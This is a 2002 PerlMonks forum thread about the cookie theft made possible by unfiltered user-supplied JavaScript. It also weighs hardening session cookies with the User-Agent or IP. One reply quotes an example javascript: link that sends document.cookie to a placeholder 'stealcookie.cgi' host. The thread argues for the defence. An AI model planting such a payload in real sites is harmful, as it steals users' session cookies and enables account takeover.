http://qs321.pair.com?node_id=207040


in reply to Re: Re(3): Filtering potentially dangerous URI schemas in <a href="...">
in thread Filtering potentially dangerous URI schemas in <a href="...">

I would very much appreciate a primer on where my understanding of cookie security is wrong. Is it that the cookie is only appearing encrypted on my machine while it is not, or that you know the server salt, or that you used an improved cracklib (mind you the pwd string is not that good), or that you got a cleartext cookie?
Actually, it is none of this. I am sure the password is encrypted and I do not know now what it is/was. I know nothing about the server, much less any salt and have no access to such information. I did not use any tools besides a browser. And the only thing I got was the string you provided me with.

What you missed about cookie security is simply this: if you browser needs certain information to remember you and keep you logged in, then my browser can use the same information to log me in as you.

This is why user supplied javascript is insecure on a site like this, because I can get that information about you and send it to me. Javascript is generally not insecure in this way, and even though I rarely use them, I do not disapprove of js as such - used right, it is fine. What we have here is the unlucky combination of user supplied javascript that is not filtered and a login that doesn't time you out or take other measures to ensure that you are you. So generally, such as warning as Petruchio's is also uncalled for, it is only valid for this site and other sites that allow this. Keep js on for any other place if you want. :)

I do not wish to change the login and cookie thingy - it is fine if we just remove the scripts. And it is safe in other ways, meaning that it is as hard or harder to simply guess your cookie without information as it is guessing your password in the first place.


You have moved into a dark place.
It is pitch black. You are likely to be eaten by a grue.

Replies are listed 'Best First'.
Re: Hacking "explained"
by Aristotle (Chancellor) on Oct 22, 2002 at 12:56 UTC

    The scheme could be at least slightly improved without a total change though, by using information such as the user agent string and other headers from the HTTP request to influence the encryption, so that it would at least be more difficult to use stolen cookies.

    (Note this is orthogonal to the Javascript banning question. Whether cookies get hardened is irrelevant to whether JS should be filtered.)

    Makeshifts last the longest.

      While using other information might help, is there any reason an evil script won't be able to send your user agent, or any other information about your browser to it's author? So instead of just stealing your cookie, it'll report the user agent, and anything else required to fake a logged in session. The only thing that couldn't be faked is the IP address, but you can't do sessioning based on IPs, as often there isn't a one-to-one mapping between users and IPs.

      That said, I think it's a bad idea to try to outsmart hackers - there's always going to be one smarter than you thought. Any reason why not to bad JS from the public forums?

      -- Dan

        The idea is that it isn't known which headers are used as additional information. This is only security by obscurity of course, but it's slightly better than no extra measures at all.

        You did notice I said this point was completely orthogonal to banning JS, right? Obviously the script on the other side of <a href="javascript:open('http://foo.com/stealcookie.cgi?c='+document.cookie,'_self','',1)"> can record the entire HTTP request header anyway, so these issues have nothing to do with each other.

        Makeshifts last the longest.

      Funny, I mentioned exactly that example when post-discussing with hackmare. :) Mix the User-Agent with the pw before encrypting and the attacker must use or simulate the exact same browser. Just obscurity, yes, but better than nothing. :)

      Using IP, as some would suggest, is generally a bad method, as it changes (sometimes every request) for lots of people.


      You have moved into a dark place.
      It is pitch black. You are likely to be eaten by a grue.
        Yep. In fact, using the IP is even worse when you count in things like proxies (which may be transparent ones to complicate matters further). There are millions of reasons you don't want to be using the IP.

        Makeshifts last the longest.